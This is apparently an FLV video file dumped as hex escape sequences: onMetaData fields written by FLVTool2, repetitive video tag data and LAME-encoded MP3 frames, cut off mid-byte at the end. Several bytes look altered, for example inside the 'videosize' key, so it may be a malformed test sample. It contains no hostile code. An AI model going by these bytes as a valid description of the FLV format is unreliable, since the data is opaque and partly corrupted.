40\xD5\x7C\x00\x00\x00\x00\x00\x00\x0C\x76\x69\x64\x65\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x08\x64\x61\x74\x61\x73\x69\x7A\x65\x00\x41\x09\x3F\x88\x00\x00\x00\x00\x00\x0D\x6C\x61\x73\x74\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x40\x13\x7C\xED\x91\x68\x72\xB0\x00\x0F\x61\x75\x64\x69\x6F\x73\x61\x6D\x70\x6C\x65\x73\x69\x7A\x65\x00\x40\x30\x00\x00\x00\x00\x00\x00\x00\x09\x61\x75\x64\x69\x6F\x73\x69\x7A\x65\x00\x40\xF4\x5D\x40\x00\x00\x00\x00\x00\x08\x68\x61\x73\x41\x75\x64\x69\x6F\x01\x01\x00\x0A\x61\x75\x64\x69\x6F\x64\x65\x6C\x61\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x76\x69\x64\xB9\x6F\x73\x69\x7A\x65\x00\x40\xFD\xF4\x70\x00\x00\x00\x00\x00\x0C\x6D\x65\x74\x61\x64\x61\x74\x61\x64\x61\x74\x65\x0B\x42\x73\xB6\xA9\xFC\x66\x60\x00\xFE\x20\x00\x0F\x6D\x65\x74\x61\x64\x61\x74\x61\x63\x72\x65\x61\x74\x6F\x72\x02\x00\x40\x69\x6E\x6C\x65\x74\x20\x6D\x65\x64\x69\x61\x20\x46\x4C\x56\x54\x6F\x6F\x6C\x32\x20\x76\x31\x2E\x30\x2E\x36\x20\x2D\x20\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x69\x6E\x6C\x65\x74\x2D\x6D\x65\x64\x69\x61\x2E\x64\x65\x2F\x66\x6C\x76\x74\x6F\x6F\x6C\x32\x00\x15\x6C\x61\x73\x74\x6B\x65\x79\x66\x72\x61\x6D\x65\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x68\x65\x69\x67\x68\x74\x00\x40\x6E\x00\x00\x00\x00\x00\x00\x00\x08\x66\x69\x6C\x65\x73\x69\x7A\x65\x00\x41\x09\x61\xB0\x00\x00\x00\x00\x00\x0B\x68\x61\x73\x4D\x65\x74\x61\x64\x61\x74\x61\x01\x01\x00\x09\x6B\x65\x79\x66\x72\x61\x6D\x65\x73\x03\x00\x0D\x66\x69\x6C\x65\x70\x6F\x73\x69\x74\x69\x6F\x6E\x73\x0A\x00\x00\x00\x01\x00\x40\x86\x28\x00\x00\x00\x00\x00\x00\x05\x74\x69\x6D\x65\x73\x0A\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x0C\x61\x75\x64\x69\x6F\x63\x6F\x64\x65\x63\x69\x64\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x76\x69\x64\x65\x6F\x64\x61\x74\x61\x72\x61\x74\x65\x00\x40\x69\x04\x41\x93\x8B\xFA\xF5\x00\x08\x64\x75\x72\x61\x74\x69\x6F\x6E\x00\x40\x13\xC1\x89\x37\x4B\xC6\xA8\x00\x0C\x68\x61\x73\x43\x75\x65\x50\x6F\x69\x6E\x74\x73\x01\x00\x00\x05\x77\x69\x64\x74\x68\x00\x40\x74\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x02\xB4\x09\x00\x07\xCA\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x84\x02\x91\x27\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\x7F\x7F\x9F\xF7\xF7\xF7\xF3\xFB\xFC\xFF\xBF\xBF\x20\x9F\xDF\xE7\xFD\xFD\xFD\xFC\xFE\xFF\x3F\xEF\xEF\xEF\xE7\xF7\xF9\xFF\x7F\x7F\x7F\x3F\xBF\xCF\xF7\xF7\xF7\xF7\xFF\xFE\x7F\xBF\xBF\xBF\xBF\xFF\xF3\xFD\xFD\xFD\xFD\xFF\xFF\x9F\xEF\xF7\xEF\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x3F\xBF\xCF\xFB\xFB\xFB\xF9\xFD\xFE\x7F\xDF\xDF\xDF\xCF\xEF\xF3\xFE\xFE\xFE\xFE\x7F\x7F\x9F\xF7\xF7\xF7\xF3\xFB\xFC\xFF\x7F\x7F\xBF\xBF\xFF\xE7\xFB\xFB\xFD\xFD\xFF\xFF\x3F\xDF\xDF\xEF\xEF\xFF\xF9\xFE\xFF\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xD8\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\x18\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xDB\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFE\x7F\xDF\xDF\xDF\xDF\xFF\xF3\xFE\xFE\xFE\xFE\xFF\xFF\x9F\xF7\xF7\xF7\xF7\xFF\xFC\xFF\xBF\xBF\xBF\xBF\xFF\xE7\xFD\xFD\xFD\xFD\xFF\xFF\x3F\xEF\xEF\xEF\xEF\xFF\xF9\xFF\x7F\x7F\x7F\x7F\xFF\xCF\xFB\xFB\xFB\xFB\xFF\xFC\x00\x00\x07\xD5\x08\x00\x01\xA2\x00\x00\x00\x00\x00\x00\x00\x2B\xFF\xF3\xC0\x64\x00\x00\x00\x01\xA4\x00\x00\x00\x00\x00\x00\x03\x48\x00\x00\x00\x00\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x09\x2D\x5D\xC4\xBC\x09\x58\x90\xD2\xE2\x4E\x87\x08\xC6\x17\xA2\xAC\x46\x03\x4C\x4C\x08\x41\x07\x24\x04\x64\x57\x83\x94\x37\x82\xC4\x1A\xE0\xEA\x07\x48\x35\xC1\xA0\x18\x62\x48\x48\xCC\xE2\xFA\x3D\x23\x88\x62\x89\x61\x50\x23\x62\x90\x2C\x63\x80\xB0\x19\x68\x62\x2D\x24\x9D\x47\x25\x52\xE9\xB4\xA2\x3D\x40\x9F\x6C\x83\x1A\x24\x06\xF5\xE5\x2A\x79\x09\x41\x0C\xC1\x6B\x17\xE3\xA0\x71\x8D\xC2\x06\x48\x88\x48\xEA\x12\xA1\x72\x11\x41\x62\x2F\xC6\x20\xE3\x27\x05\xFC\xEC\x45\x1F\xA7\x51\x92\x63\x15\x00\x00\x01\xAD\x08\x00\x01\xA3\x00\x00\x1A\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x7B\x21\x12\x0A\x78\x08\x3D\xE9\x6E\x00\x00\x03\x48\x00\x00\x00\x00\x84\xDC\xB0\x16\x33\x8C\x30\x2B\x28\x54\x54\x64\x5C\x70\x58\x7C\x90\x56\x40\x75\x12\x13\x46\x8C\x8B\x92\x13\xA0\x5D\x25\x50\xB4\xC9\xF3\xC6\xD8\x6D\x87\x3D\xCF\x73\x70\x9D\x52\x6B\x21\x44\x64\xF9\xE1\xF1\x71\x63\x64\x84\xE8\x17\x49\x54\x28\x89\x4D\x1E\x36\x60\x9C\x91\x86\xD8\x9C\x2E\x59\xBB\x93\xAB\xFE\xE9\x65\x51\x21\x26\x32\x3E\x38\x4E\x4E\x48\x8C\xA1\x54\x46\x47\x85\x87\x47\x87\x04\xE2\x82\x32\x89\xAC\x88\x94\xD0\xE8\xF9\x21\x39\x22\x35\xD2\x55\x11\x29\xA3\x06\xC9\x10\x23\x40\x74\xB2\x13\x47\x8D\x8B\x8B\x1B\x24\x46\xA2\x6B\x32\x84\xD1\x93\xE6\x0D\xA0\x6D\x85\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x23\x9C\x48\x77\x3F\xD1\xEC\x09\x32\x16\x5C\x10\x83\x7D\x06\x4A\x04\xD0\x4D\x09\x62\x18\x4E\xD1\xE7\x23\x43\x4B\x2F\xFA\x00\xDF\xE7\x72\x38\xE4\x49\x98\x1B\x07\x58\x02\xD2\x26\xA3\x33\x01\x01\x29\x1B\x9A\xA7\x75\xEA\x55\x6B\x70\xB6\x56\xC4\xE0\xF5\x6C\x48\x86\x59\x66\x37\x1B\x87\x21\x89\x64\xAE\x37\x2F\x80\x14\x01\x15\x10\x06\xCB\xE7\xE0\x34\xBF\x2E\x59\x78\xD0\x06\x98\xE0\x00\x18\x84\x0A\x03\x24\x94\x29\x40\x00\x40\x22\x29\x64\x8E\x6D\xDB\x72\xE1\xFB\x74\xF7\x2C\x7E\xA9\x28\x5A\xDB\xBF\x6A\x31\x61\x00\x00\x01\xAE\x08\x00\x01\xA3\x00\x00\x34\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x7E\x21\x7A\x2E\xE6\x04\x3F\x09\x6E\x00\x00\x03\x48\x00\x00\x00\x00\xF4\x03\x11\x15\x93\xAC\x48\xA9\x3A\x04\x10\x40\xC4\xF5\x44\x0F\x50\x91\x34\x6D\xA4\x48\xE8\x66\xD2\x01\x43\x0B\xA3\x89\x18\x6C\x56\x8D\x1A\x36\xE9\x1A\x41\x40\x00\x24\x4C\x56\x4F\x48\xDB\x5D\x1A\x35\x85\x04\x98\xA1\x23\x10\xC9\xA3\x15\xB6\x8D\x1C\xE9\x03\x0A\x20\x87\xFD\x74\x68\xD1\xEF\x82\x84\x0C\x4F\x54\x14\x12\x49\x85\xC5\x64\xF4\xC1\x70\x4C\x31\x14\x74\x40\x49\x7A\xA1\x3B\xD0\x12\x31\xEA\x08\x11\xA3\x46\xDF\x5C\x56\x2B\x36\x46\xDA\x82\x87\x11\x8A\xE4\x82\x44\x00\x81\x89\xCE\x90\x20\x46\x8D\x1E\xD2\x91\x46\x8D\x88\x42\x19\x3F\x04\x02\xB4\x7B\x58\xBA\x36\xF5\x4C\x41\x4D\x45\x33\x2E\x39\x38\x2E\x34\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x55\x6F\xA0\x03\x87\xD4\x12\x00\x92\x39\x12\xCD\x84\x02\x00\x33\x10\x55\x8F\x81\x40\x36\x4A\xEF\x16\x04\x10\x85\x9B\x65\x61\xC9\x54\xB5\xE8\x22\x97\x1D\x06\xFA\xEB\xAD\x0F\x5D\x6B\xB4\x77\xB2\xA8\xF4\xB5\x98\x76\x02\x94\xC8\x1E\xF7\x39\x7D\x3F\xCD\x69\xC6\x58\x18\x53\xE4\xEE\xA9\x8A\x3C\xA9\x62\x44\xBC\x29\x14\xE7\x2D\x65\xD1\x28\x56\xE5\x6E\x19\x12\x98\xA4\x22\xF6\x78\xD3\xA0\xBD\x10\x61\x76\x97\x34\xB1\x3F\x97\x0A\x56\x96\x65\x4C\x17\x63\x5F\x00\x00\x01\xAE\x09\x00\x00\x76\x00\x00\x43\x00\x00\x00\x00\x22\x00\x00\x84\x06\xB1\x13\xDC\xE7\x39\x3D\xCE\x73\x93\xDC\xE7\x39\x3D\xCE\x73\x93\xDC\xE7\x39\x7D\xCE\xF7\x0D\xEE\x7F\xB3\xB9\xCC\xEE\x73\x3B\x9C\xCE\xE7\x33\xB9\xCD\xEE\xF7\x0C\x6F\x37\x9B\xCD\xCC\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xF5\xB0\x60\x1C\xBC\x0C\x00\x80\x43\xFF\x94\xC0\x3D\x8D\xF4\x33\x63\xB5\xDF\xFF\xFA\x4D\x8A\xE0\x60\x1A\x95\x00\x7A\x82\xE2\x0B\xA6\x17\xCB\xDF\x4F\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xC0\x00\x00\x00\x81\x08\x00\x01\xA3\x00\x00\x4E\x00\x00\x00\x00\x2B\xFF\xF3\xC2\x64\x6F\x1F\x92\x28\xF2\x09\x33\x0C\x6E\x80\x00\x03\x48\x00\x00\x00\x00\x64\x65\xB9\x6B\x48\x08\x49\x19\xE6\x90\xC4\x99\x9A\x5F\xC3\xED\x28\x75\x07\x06\x22\x39\x91\x6C\x47\x06\xE1\x00\xCC\x31\x12\xCA\xEB\xCD\x8A\x62\x3E\xA4\x5E\xE1\xF9\x2D\xE4\x7C\xA1\x3B\x30\xBA\xBE\x19\x86\x0E\x36\xA4\x6E\x9D\xD3\x1D\xC7\x15\xC1\x7E\xBF\xFD\x1E\xD8\x6B\xB0\x3D\x97\xB6\x56\xD1\xCD\x68\xFB\x3B\x4A\xDB\x67\x16\x6D\x6D\x9B\x1B\x3B\x4A\x6E\x47\xB7\xBC\xEC\xCE\xE7\xCE\xDA\x67\xED\x6F\xFC\x66\xB1\x5F\x6A\xEF\x3D\x36\x6A\x8C\xAD\xC9\xF6\x17\x35\x95\x96\x97\x7B\x98\xFB\x3C\xED\xED\xA